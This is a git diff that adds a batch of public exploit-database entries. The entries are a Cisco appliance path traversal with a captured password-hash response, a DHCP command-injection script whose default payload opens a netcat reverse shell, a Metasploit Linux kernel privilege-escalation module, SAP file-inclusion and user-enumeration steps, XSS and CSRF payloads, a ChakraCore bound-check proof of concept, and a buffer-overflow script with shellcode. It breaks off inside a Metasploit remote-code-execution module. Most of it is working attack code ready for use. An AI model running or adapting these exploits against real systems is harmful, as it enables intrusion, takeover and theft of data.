diff --git a/exploits/hardware/local/44644.txt b/exploits/hardware/local/44644.txt new file mode 100644 index 000000000..151fee093 --- /dev/null +++ b/exploits/hardware/local/44644.txt @@ -0,0 +1,20 @@ +For Xbox-SystemOS version: 10.0.14393.2152 (rs1_xbox_rel_1610 161208-1218) fre, 12/14/2016 + +Other versions will most likely need modifications to the script. + +**Credits**: +- https://github.com/theori-io/chakra-2016-11 +- https://bugs.chromium.org/p/project-zero/issues/detail?id=952 +- https://bugs.chromium.org/p/project-zero/issues/detail?id=945 + +**Info**: +It is not sufficient to start an .exe via shellcode ;) + +Exploiters, be creative! + +It is desired to find a way to invoke edge engine when console is offline + +Greets from unknownv2 & mon0 _ + + +Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44644.zip \ No newline at end of file diff --git a/exploits/hardware/webapps/44650.txt b/exploits/hardware/webapps/44650.txt new file mode 100644 index 000000000..703357f8e --- /dev/null +++ b/exploits/hardware/webapps/44650.txt @@ -0,0 +1,55 @@ +# Title: Cisco SA520W Security Appliance - Path Traversal +# Author: Nassim Asrir +# Contact: wassline@gmail.com / https://www.linkedin.com/in/nassim-asrir-b73a57122/ +# Vendor: https://www.cisco.com/ +# About Product: +=============== +Cisco SA 500 Series Security Appliances are designed for businesses with fewer than 100 employees. +They combine firewall, VPN, and optional intrusion prevention system (IPS), email, and web security capabilities. Whether in the office or working remotely, your employees can securely access the resources they need, while your business is protected from unauthorized access and Internet threats. + +# POC +==================== + +//In our poc we will try to read /etc/passwd + +The vulnerable Parameter: thispage + +payload: ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00index.htm + +Request Type: POST + +Request: +======= + +POST /scgi-bin/platform.cgi HTTP/1.1 +Host: host-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Referer: https://70.186.255.169/scgi-bin/platform.cgi +Content-Type: application/x-www-form-urlencoded +Content-Length: 311 +Connection: close +Upgrade-Insecure-Requests: 1 + +thispage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00index.htm&SSLVPNUser.UserName=admin&SSLVPNUser.Password=admin&button.login.routerStatus=Log+In&Login.userAgent=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A58.0%29+Gecko%2F20100101+Firefox%2F58.0 + +Response: +======== + +HTTP/1.0 200 OK +Date: Sat, 01 Jan 2000 00:00:41 GMT +Server: Embedded HTTP Server. +Connection: close +root:$1$omdZQoH8$bFOOjhl.E7BKKzvW/bRJe0:0:0:root:/:/bin/sh +nobody:x:0:0:nobody:/nonexistent:/bin/false + +#Timeline: +========= + +18 Apr 2018 : First Contact with Cisco. +18 Apr 2018 : Cisco Ask me for more details about the vulnerability. +18 Apr 2018 : Details sent to Cisco +19 Apr 2018 : Ask for update +15 May 2018 : Cisco say "The product you reference went end of support in April 2016 No further action will be taken." +18 May 2018 : Public Disclosure \ No newline at end of file diff --git a/exploits/linux/local/44652.py b/exploits/linux/local/44652.py new file mode 100755 index 000000000..c6d50ff70 --- /dev/null +++ b/exploits/linux/local/44652.py @@ -0,0 +1,65 @@ +# Exploit Title: DynoRoot DHCP - Client Command Injection +# Date: 2018-05-18 +# Exploit Author: Kevin Kirsche +# Exploit Repository: https://github.com/kkirsche/CVE-2018-1111 +# Exploit Discoverer: Felix Wilhelm +# Vendor Homepage: https://www.redhat.com/ +# Version: RHEL 6.x / 7.x and CentOS 6.x/7.x +# Tested on: CentOS Linux release 7.4.1708 (Core) / NetworkManager 1.8.0-11.el7_4 +# CVE : CVE-2018-1111 + +#!/usr/bin/env python + +from argparse import ArgumentParser +from scapy.all import BOOTP_am, DHCP +from scapy.base_classes import Net + + +class DynoRoot(BOOTP_am): + function_name = "dhcpd" + + def make_reply(self, req): + resp = BOOTP_am.make_reply(self, req) + if DHCP in req: + dhcp_options = [(op[0], {1: 2, 3: 5}.get(op[1], op[1])) + for op in req[DHCP].options + if isinstance(op, tuple) and op[0] == "message-type"] + dhcp_options += [("server_id", self.gw), + ("domain", self.domain), + ("router", self.gw), + ("name_server", self.gw), + ("broadcast_address", self.broadcast), + ("subnet_mask", self.netmask), + ("renewal_time", self.renewal_time), + ("lease_time", self.lease_time), + (252, "x'&{payload} #".format(payload=self.payload)), + "end" + ] + resp /= DHCP(options=dhcp_options) + return resp + + +if __name__ == '__main__': + parser = ArgumentParser(description='CVE-2018-1111 DynoRoot exploit') + + parser.add_argument('-i', '--interface', default='eth0', type=str, + dest='interface', + help='The interface to listen for DHCP requests on (default: eth0)') + parser.add_argument('-s', '--subnet', default='192.168.41.0/24', type=str, + dest='subnet', help='The network to assign via DHCP (default: 192.168.41.0/24)') + parser.add_argument('-g', '--gateway', default='192.168.41.254', type=str, + dest='gateway', help='The network gateway to respond with (default: 192.168.41.254)') + parser.add_argument('-d', '--domain', default='victim.net', type=str, + dest='domain', help='Domain to assign (default: victim.net)') + parser.add_argument('-p', '--payload', default='nc -e /bin/bash 192.168.41.2 1337', type=str, + dest='payload', help='The payload / command to inject (default: nc -e /bin/bash 192.168.41.2 1337)') + + args = parser.parse_args() + server = DynoRoot(iface=args.interface, domain=args.domain, + pool=Net(args.subnet), + network=args.subnet, + gw=args.gateway, + renewal_time=600, lease_time=3600) + server.payload = args.payload + + server() \ No newline at end of file diff --git a/exploits/linux/local/44654.rb b/exploits/linux/local/44654.rb new file mode 100755 index 000000000..496d4f9ff --- /dev/null +++ b/exploits/linux/local/44654.rb @@ -0,0 +1,203 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = GoodRanking + + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Post::Linux::System + include Msf::Post::Linux::Kernel + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'AF_PACKET packet_set_ring Privilege Escalation', + 'Description' => %q{ + This module exploits a heap-out-of-bounds write in the packet_set_ring + function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel + to execute code as root (CVE-2017-7308). + + The bug was initially introduced in 2011 and patched in version 4.10.6, + potentially affecting a large number of kernels; however this exploit + targets only systems using Ubuntu Xenial kernels 4.8.0 < 4.8.0-46, + including Linux distros based on Ubuntu Xenial, such as Linux Mint. + + The target system must have unprivileged user namespaces enabled and + two or more CPU cores. + + Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation + may crash the kernel. + + This module has been tested successfully on Linux Mint 18 (x86_64) + with kernel versions: + + 4.8.0-34-generic; + 4.8.0-36-generic; + 4.8.0-39-generic; + 4.8.0-41-generic; + 4.8.0-42-generic; + 4.8.0-44-generic; + 4.8.0-45-generic. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Andrey Konovalov', # Discovery and C exploit + 'Brendan Coles' # Metasploit + ], + 'DisclosureDate' => 'Mar 29 2017', + 'Platform' => [ 'linux' ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [[ 'Auto', {} ]], + 'Privileged' => true, + 'References' => + [ + [ 'EDB', '41994' ], + [ 'CVE', '2017-7308' ], + [ 'BID', '97234' ], + [ 'URL', 'https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html' ], + [ 'URL', 'https://www.coresecurity.com/blog/solving-post-exploitation-issue-cve-2017-7308' ], + [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7308.html', ], + [ 'URL', 'https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c' ], + [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/cve-2017-7308/CVE-2017-7308/poc.c' ] + ], + 'DefaultTarget' => 0)) + register_options [ + OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]), + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), + ] + end + + def base_dir + datastore['WritableDir'].to_s + end + + def upload(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + write_file path, data + end + + def upload_and_chmodx(path, data) + upload path, data + cmd_exec "chmod +x '#{path}'" + end + + def upload_and_compile(path, data) + upload "#{path}.c", data + gcc_cmd = "gcc -o #{path} #{path}.c" + if session.type.eql? 'shell' + gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}" + end + + output = cmd_exec gcc_cmd + unless output.blank? + print_error output + fail_with Failure::Unknown, "#{path}.c failed to compile" + end + + cmd_exec "chmod +x #{path}" + end + + def exploit_data(file) + path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-7308', file + fd = ::File.open path, 'rb' + data = fd.read fd.stat.size + fd.close + data + end + + def live_compile? + return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') + + if has_gcc? + vprint_good 'gcc is installed' + return true + end + + unless datastore['COMPILE'].eql? 'Auto' + fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' + end + end + + def check + version = kernel_release + unless version =~ /^4\.8\.0-(34|36|39|41|42|44|45)-generic/ + vprint_error "Linux kernel version #{version} is not vulnerable" + return CheckCode::Safe + end + vprint_good "Linux kernel version #{version} is vulnerable" + + arch = kernel_hardware + unless arch.include? 'x86_64' + vprint_error "System architecture #{arch} is not supported" + return CheckCode::Safe + end + vprint_good "System architecture #{arch} is supported" + + cores = get_cpu_info[:cores].to_i + min_required_cores = 2 + unless cores >= min_required_cores + vprint_error "System has less than #{min_required_cores} CPU cores" + return CheckCode::Safe + end + vprint_good "System has #{cores} CPU cores" + + unless userns_enabled? + vprint_error 'Unprivileged user namespaces are not permitted' + return CheckCode::Safe + end + vprint_good 'Unprivileged user namespaces are permitted' + + if kptr_restrict? && dmesg_restrict? + vprint_error 'Both kernel.kptr_restrict and kernel.dmesg_destrict are enabled. KASLR bypass will fail.' + return CheckCode::Safe + end + + CheckCode::Appears + end + + def exploit + if check != CheckCode::Appears + fail_with Failure::NotVulnerable, 'Target is not vulnerable' + end + + if is_root? + fail_with Failure::BadConfig, 'Session already has root privileges' + end + + unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true' + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + # Upload exploit executable + executable_name = ".#{rand_text_alphanumeric rand(5..10)}" + executable_path = "#{base_dir}/#{executable_name}" + if live_compile? + vprint_status 'Live compiling exploit on system...' + upload_and_compile executable_path, exploit_data('poc.c') + rm_f "#{executable_path}.c" + else + vprint_status 'Dropping pre-compiled exploit on system...' + upload_and_chmodx executable_path, exploit_data('exploit') + end + + # Upload payload executable + payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}" + upload_and_chmodx payload_path, generate_payload_exe + + # Launch exploit + print_status 'Launching exploit...' + output = cmd_exec "#{executable_path} #{payload_path}" + output.each_line { |line| vprint_status line.chomp } + print_status 'Deleting executable...' + rm_f executable_path + Rex.sleep 5 + print_status 'Deleting payload...' + rm_f payload_path + end +end \ No newline at end of file diff --git a/exploits/linux/webapps/44647.txt b/exploits/linux/webapps/44647.txt new file mode 100644 index 000000000..0e56084ef --- /dev/null +++ b/exploits/linux/webapps/44647.txt @@ -0,0 +1,47 @@ +# Application: SAP NetWeaver Web Dynpro 6.4 to 7.5 - Information disclosure +# Versions Affected: SAP NetWeaver 6.4 - 7.5 +# Vendor URL: http://SAP.com +# Bugs: Information disclosure (Enumerate users) +# Sent: 2016-12-15 +# Reported: 2016-12-15 +# Date of Public Advisory: 09.02.2016 +# Reference: SAP Security Note 2344524 +# Author: Richard Alviarez (SIA Group) +# CVE: N/A + +# 1. ADVISORY INFORMATION +# Title: SAP NetWeaver Web Dynpro – information disclosure (Enumerate users) +# Advisory ID: 2344524 +# Risk: Medium +# Date published: 20.12.2016 + +# 2. VULNERABILITY DESCRIPTION +# Anonymous attacker can use a special HTTP request to get information +# about SAP NetWeaver users. + +# 3. VULNERABLE PACKAGES +# SAP NetWeaver Web Dynpro 6.4 - 7.5 +# Other versions are probably affected too, but they were not checked. + +# 4. TECHNICAL DESCRIPTION +# A potential attacker can use the vulnerability in order to reveal +# information about user names, +# first and last names, and associated emails, this can provide an attacker +# with enough information +# to make a more accurate and effective attack + +# Steps to exploit this vulnerability + +1. Open +http://SAP/webdynpro/dispatcher/sap.com/caf~eu~gp~example~timeoff~wd/ACreate +or +http://SAP/webdynpro/dispatcher/sap.com/caf~eu~gp~example~timeoff~wd/com.sap.caf.eu.gp.example.timeoff.wd.create.ACreate + +page on SAP server + +2. Press "Change processor" button + +3. and in the "find" section, put the initial or name to be searched, +followed by a * + +You will get a list of SAP users and information. \ No newline at end of file diff --git a/exploits/linux/webapps/44655.txt b/exploits/linux/webapps/44655.txt new file mode 100644 index 000000000..d96e1d566 --- /dev/null +++ b/exploits/linux/webapps/44655.txt @@ -0,0 +1,43 @@ +# Title: SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion +# Application:SAP B2B OR B2C is CRM +# Versions Affected: SAP B2B OR B2C is CRM 2.x 3.x and 4.x with Bakend R/3 (to icss_b2b) +# Vendor URL: http://SAP.com +# Bugs: SAP LFI in B2B OR B2C CRM +# Sent: 2018-05-03 +# Reported: 2018-05-03 +# Date of Public Advisory: 2018-02-09 +# Reference: SAP Security Note 1870255656 +# Author: Richard Alviarez + +# 1. VULNERABLE PACKAGES +# SAP LFI in B2B OR B2C CRM v2.x to 4.x +# Other versions are probably affected too, but they were not checked. + +# 2. TECHNICAL DESCRIPTION +# A possible attacker can take advantage of this vulnerability +# to obtain confidential information of the platform, +# as well as the possibility of writing in the logs of the +# registry in order to get remote execution of commands and take control of the system. + + +# 3. Steps to exploit this vulnerability + +A. Open +https://SAP/{name}_b2b/initProductCatalog.do?forwardPath=/WEB-INF/web.xml + +Other vulnerable parameters: + +https://SAP/{name}_b2b/CatalogClean.do?forwardPath=/WEB-INF/web.xml +https://SAP/{name}_b2b/IbaseSearchClean.do?forwardPath=/WEB-INF/web.xml +https://SAP/{name}_b2b/ForwardDynamic.do?forwardPath=/WEB-INF/web.xml +page on SAP server + +B. Change parameter {name} for example icss_b2b or other name.... + +C. Change "/WEB-INF/web.xml" for other files or archives internal. + + +# 4. Collaborators +# - CuriositySec +# - aDoN90 +# - Vis0r \ No newline at end of file diff --git a/exploits/php/webapps/44645.txt b/exploits/php/webapps/44645.txt new file mode 100644 index 000000000..4bb88c1c6 --- /dev/null +++ b/exploits/php/webapps/44645.txt @@ -0,0 +1,70 @@ +# Exploit Title: Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery +# Date: 2018-05-17 +# Exploit Author: L0RD +# Vendor Homepage: https://codecanyon.net/item/healwire-online-pharmacy/16423338?s_rank=1499 +# Version: 3.0 +# Tested on: windows + +# POC 1 : Cross site scripting : +1) Create an account and go to your profile. +2) When we want to put "" in the fields,"script" will be +replaced with null. +so we can bypass this filter by using javascript's events like +"onmouseover" or "oninput" . +Put one of these payloads into the fields : +1 - " oninput=alert('xss') " +2 - " onmouseover=alert('xss') " +3) You will get an alert box inside the page . ( after put something into +the fields or move mouse on the fields) + + +# POC 2 : Cross-Site request forgery : +# With csrf vulnerability,attacker can easily change user's authentication. +# So in this script , we have anti-CSRF token .We can't change user's +# information without token. +# but there is a vulnerable parameter which has reflected xss in another page +# of this script. +# http://store.webandcrafts.com/demo/healwire/?msg= [We have Reflected XSS here] +# Now we can bypass anti-csrf by this parameter and using javascript: + + +# Exploit : + +"/>
+ + + + + + +
+ + +# You can also send 2 ajax requests instead of using form . +# Encode this payload and put this into "msg" parameter +# JSON result after 3 seconds : + +status "SUCCESS" +msg "User profile updated !" \ No newline at end of file diff --git a/exploits/php/webapps/44646.txt b/exploits/php/webapps/44646.txt new file mode 100644 index 000000000..7f0ff2dd4 --- /dev/null +++ b/exploits/php/webapps/44646.txt @@ -0,0 +1,48 @@ +# Exploit Title: Monstra CMS 3.0.4 - Cross-Site Scripting +# Date: 2018-05-17 +# Exploit Author: Berk Dusunur +# Vendor Homepage: https://monstra.org +# Software Link: https://monstra.org +# Version: before 3.0.4 +# Tested on: Pardus / Win10 AppServer + +# Proof Of Concept +# Monstra is a modern and lightweight Content Management System. +# Prints get request between script tags on page + + +Payload ?vrk2f'-alert(1)-'ax8vv=1 + +GET Request + +GET /test/monstra-3.0.4/?vrk2f'-alert(1)-'ax8vv=1 HTTP/1.1 +Host: 192.168.1.106 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0) Gecko/20100101 +Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 + +Response + + + + + +http://localhost/test/monstra-3.0.4/?vrk2f'-alert(1)-'ax8vv=1 \ No newline at end of file diff --git a/exploits/php/webapps/44651.txt b/exploits/php/webapps/44651.txt new file mode 100644 index 000000000..623731f33 --- /dev/null +++ b/exploits/php/webapps/44651.txt @@ -0,0 +1,31 @@ +# Exploit Title: Infinity Market Classified Ads Script 1.6.2 - Cross-Site Request Forgery +# Date: 2018-05-18 +# Exploit Author: L0RD +# Vendor Homepage: https://codecanyon.net/item/classifieds-multipurpose-portal-infinity-market/16572285?s_rank=1520 +# Version: 1.6.2 +# Tested on: Kali linux + +# Description : CSRF vulnerability allows attacker to change user's information directly . + +# POC : + + + + CSRF POC + + +
+ + + + + + + + +
+ + + \ No newline at end of file diff --git a/exploits/windows/dos/44653.js b/exploits/windows/dos/44653.js new file mode 100644 index 000000000..bd321e631 --- /dev/null +++ b/exploits/windows/dos/44653.js @@ -0,0 +1,151 @@ +/* +Chakra uses the InvariantBlockBackwardIterator class to backpropagate the information about the hoisted bound checks. But the class follows the linked list instaed of the control flow. This may lead to incorrectly remove the bound checks. + +In the following code, currentBlock's block number is 4 and hoistBlock's block number is 1 (please see the IR code). I assume it should visit 4 -> 3 (skipped) -> 1 (break) in order with following the control flow, but it actually visits 4 -> 3 (skipped) -> 2 -> 1 (break) in order. This makes the block 2 have the wrong information about the bounds which affects the bound checks in the block 5 to be removed. + +https://github.com/Microsoft/ChakraCore/blob/48c73e51c3e0fb36a08fa844cdb88c9d8a54de32/lib/Backend/GlobOpt.cpp#L14667 + +if(hoistBlock != currentBlock) +{ + for(InvariantBlockBackwardIterator it(this, currentBlock->next, hoistBlock, nullptr); + it.IsValid(); + it.MoveNext()) + { + BasicBlock *const block = it.Block(); + ... + +PoC: +*/ + +function opt(arr, idx) { + ((arr.length === 0x7ffffff0 && arr[0x7ffffff0]) || false) && (arr.length === 0x7ffffff0 && arr[0x7ffffff1]) || (arr[0x11111111] = 0x1234); +} + +function main() { + let arr = new Uint32Array(1); + for (let i = 0; i < 10000; i++) { + opt(arr); + } +} + +main(); + +/* +Here's the IR code for the PoC: + + FunctionEntry # +--------- + +BLOCK 0: Out(1, 2) + +$L8: # + s1[Object].var = Ld_A 0xXXXXXXXX (GlobalObject)[Object].var # + s21(s2)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 2147483632 (0x7FFFFFF0)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 # + s3[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var # + s22(s4)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 2147483633 (0x7FFFFFF1)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 # + s23(s5)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 286331153 (0x11111111)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 # + s24(s6)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 4660 (0x1234)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 # + s7[LikelyCanBeTaggedValue_Uint32Array].var = ArgIn_A prm2<40>[LikelyCanBeTaggedValue_Uint32Array].var! # + s8[LikelyUndefined_CanBeTaggedValue].var = ArgIn_A prm3<48>[LikelyUndefined_CanBeTaggedValue].var! # + + + Line 2: arr.length === 0x7ffffff0 && arr[0x7ffffff0]) || false) && (arr.length === 0x7ffffff0 && arr[0x7ffffff1]) || (arr[0x11111111] = 0x1234); + Col 7: ^ + StatementBoundary #0 #0000 + BailOnNotArray s7[LikelyCanBeTaggedValue_Uint32Array].var #0000 Bailout: #0000 (BailOutOnNotArray) + s25.u32 = LdIndir [s7[Uint32Array].var+32].u32 #0000 + NoImplicitCallUses s25.u32 #0000 + ByteCodeUses s7 #0000 + s26(s10)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 s25.u32 #0000 + s15[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #0004 + s9[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #0004 + ByteCodeUses s10 #0004 + BrNeq_I4 $L4, s26(s10)[CanBeTaggedValue_Int_IntCanBeUntagged].i32!, 2147483632 (0x7FFFFFF0).i32 #0004 +--------- + +BLOCK 1: In(0) Out(2, 3) + +$L7: #0008 + s15[Boolean].var = Ld_A 0xXXXXXXXX (true)[Boolean].var #0008 + s9[Boolean].var = Ld_A 0xXXXXXXXX (true)[Boolean].var #0008 + BoundCheck 2147483633 < s25.u32 #000f Bailout: #000f (BailOutOnFailedHoistedBoundCheck) + s27.u64 = LdIndir [s7[Uint32Array].var+56].u64 #000f + NoImplicitCallUses s25.u32 #000f + s28(s16)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = LdElemI_A [s7[Uint32Array][seg: s27][segLen: s25][><].var+2147483632].var #000f Bailout: #000f (BailOutConventionalTypedArrayAccessOnly) + ByteCodeUses s16 #0015 + s29(s9)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 s28(s16)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #0015 + s9[CanBeTaggedValue_Int].var = ToVar s29(s9)[CanBeTaggedValue_Int].i32 #0018 + ByteCodeUses s16 #0018 + BrTrue_I4 $L3, s28(s16)[CanBeTaggedValue_Int_IntCanBeUntagged].i32! #0018 +--------- + +BLOCK 2: In(0, 1) Out(5) + +$L4: #001c + s9[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #001c + Br $L2 #001e +--------- + +BLOCK 3: In(1) Out(4) DeadOut(5) + +$L3: #0021 + NoImplicitCallUses s25.u32 #0021 + ByteCodeUses s7 #0021 + s30(s17)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 s25.u32 #0021 + s18[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #0025 + s9[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #0025 + ByteCodeUses s17 #0025 +--------- + +BLOCK 4: In(3) Out(8, 5) + +$L6: #0029 + s18[Boolean].var = Ld_A 0xXXXXXXXX (true)[Boolean].var #0029 + s9[Boolean].var = Ld_A 0xXXXXXXXX (true)[Boolean].var #0029 + NoImplicitCallUses s25.u32 #0030 + s31(s19)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = LdElemI_A [s7[Uint32Array][seg: s27][segLen: s25][><].var+2147483633].var #0030 Bailout: #0030 (BailOutConventionalTypedArrayAccessOnly) + ByteCodeUses s19 #0036 + s29(s9)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 s31(s19)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #0036 + s9[CanBeTaggedValue_Int].var = ToVar s29(s9)[CanBeTaggedValue_Int].i32 #0039 + ByteCodeUses s19 #0039 + BrTrue_I4 $L9, s31(s19)[CanBeTaggedValue_Int_IntCanBeUntagged].i32! #0039 +--------- + +BLOCK 5: In(2, 4) Out(6) DeadIn(3) + +$L2: #003d + s32.u64 = LdIndir [s7[Uint32Array].var+56].u64 #003d + NoImplicitCallUses s25.u32 #003d + [s7[Uint32Array][seg: s32][segLen: s25][><].var+286331153].var = StElemI_A 4660 (0x1234).i32 #003d Bailout: #003d (BailOutConventionalTypedArrayAccessOnly) + s33(s20)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 4660 (0x1234)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #0043 + ByteCodeUses s20 #0046 + s29(s9)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4 4660 (0x1234)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #0046 + s34.u64 = Ld_A s32.u64 #004b + Br $L1 #004b +--------- + +BLOCK 8: **** Air lock Block **** In(4) Out(6) + +$L9: #004b + s34.u64 = Ld_A s27.u64 #004b + Br $L1 #004b +--------- + +BLOCK 6: In(8, 5) Out(7) + +$L1: #004b + s0[Undefined].var = Ld_A 0xXXXXXXXX (undefined)[Undefined].var #004b + + + Line 3: } + Col 1: ^ + StatementBoundary #1 #004d + StatementBoundary #-1 #004d + Ret s0[Undefined].var! #004d +--------- + +BLOCK 7: In(6) + +$L5: # +---------------------------------------------------------------------------------------- +*/ \ No newline at end of file diff --git a/exploits/windows/local/44649.py b/exploits/windows/local/44649.py new file mode 100755 index 000000000..ba8fd4ec0 --- /dev/null +++ b/exploits/windows/local/44649.py @@ -0,0 +1,43 @@ +# Exploit Title: Prime95 Local Buffer Overflow (SEH) +# Date: 13-4-2018 +# Exploit Author: crash_manucoot +# Contact: twitter.com/crash_manucoot +# Vendor Homepage: https://www.mersenne.org/ +# Software Link: https://www.mersenne.org/download/#download +# Version: 29.4b8 +# Tested on: Windows 10 Pro x64 SPANISH Windows 7 Home Premium x86 SPANISH Windows XP SP3 SPANISH +# Category: Windows Local Exploit +# How to use: open the program go to test-PrimeNet-check the square-Connections paste the contents of open.txt in the optional proxy hostname field and the calculator will open + +buffer = "A" * 660 +nseh = "\xeb\x06\x90\x90" +seh = "\x6B\xB0\xED\x6A" #pop esi # pop ebx # ret | {PAGE_EXECUTE_READ} [libgmp-10.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0 +nop = "\x90" * 16 + +#msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python -v shellcode +shellcode = "" +shellcode += "\xbf\xc6\xde\x94\x3e\xda\xd0\xd9\x74\x24\xf4\x5d" +shellcode += "\x31\xc9\xb1\x31\x31\x7d\x13\x03\x7d\x13\x83\xc5" +shellcode += "\xc2\x3c\x61\xc2\x22\x42\x8a\x3b\xb2\x23\x02\xde" +shellcode += "\x83\x63\x70\xaa\xb3\x53\xf2\xfe\x3f\x1f\x56\xeb" +shellcode += "\xb4\x6d\x7f\x1c\x7d\xdb\x59\x13\x7e\x70\x99\x32" +shellcode += "\xfc\x8b\xce\x94\x3d\x44\x03\xd4\x7a\xb9\xee\x84" +shellcode += "\xd3\xb5\x5d\x39\x50\x83\x5d\xb2\x2a\x05\xe6\x27" +shellcode += "\xfa\x24\xc7\xf9\x71\x7f\xc7\xf8\x56\x0b\x4e\xe3" +shellcode += "\xbb\x36\x18\x98\x0f\xcc\x9b\x48\x5e\x2d\x37\xb5" +shellcode += "\x6f\xdc\x49\xf1\x57\x3f\x3c\x0b\xa4\xc2\x47\xc8" +shellcode += "\xd7\x18\xcd\xcb\x7f\xea\x75\x30\x7e\x3f\xe3\xb3" +shellcode += "\x8c\xf4\x67\x9b\x90\x0b\xab\x97\xac\x80\x4a\x78" +shellcode += "\x25\xd2\x68\x5c\x6e\x80\x11\xc5\xca\x67\x2d\x15" +shellcode += "\xb5\xd8\x8b\x5d\x5b\x0c\xa6\x3f\x31\xd3\x34\x3a" +shellcode += "\x77\xd3\x46\x45\x27\xbc\x77\xce\xa8\xbb\x87\x05" +shellcode += "\x8d\x34\xc2\x04\xa7\xdc\x8b\xdc\xfa\x80\x2b\x0b" +shellcode += "\x38\xbd\xaf\xbe\xc0\x3a\xaf\xca\xc5\x07\x77\x26" +shellcode += "\xb7\x18\x12\x48\x64\x18\x37\x2b\xeb\x8a\xdb\x82" +shellcode += "\x8e\x2a\x79\xdb" + +evil = buffer + nseh + seh + nop + shellcode + +file = open('open.txt','w+') +file.write(evil) +file.close() \ No newline at end of file diff --git a/exploits/windows/remote/44648.rb b/exploits/windows/remote/44648.rb new file mode 100755 index 000000000..4e83a0cf8 --- /dev/null +++ b/exploits/windows/remote/44648.rb @@ -0,0 +1,115 @@ +# Exploit Title: HPE iMC EL Injection Unauthenticated RCE +# Date: 6 February, 2018 +# Exploit Author: TrendyTofu +# Vendor Homepage: https://www.hpe.com/us/en/home.html +# Software Link: http://h10145.www1.hpe.com/Downloads/SoftwareReleases.aspx?ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535 +# Version: prior to 7.3 E0504P04 +# Tested on: iMC PLAT v7.3 (E0504P02), Windows Server 2012R2 x64 (EN) +# CVE : CVE-2017-8982, CVE-2017-12500 +# Reference: +https://www.thezdi.com/blog/2018/2/6/one-mans-patch-is-another-mans-treasure-a-tale-of-a-failed-hpe-patch + +Metasploit module also hosted on Github. Posted below for reference: +https://raw.githubusercontent.com/thezdi/scripts/master/msf/hp_imc_el_injection_rce.rb + + +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 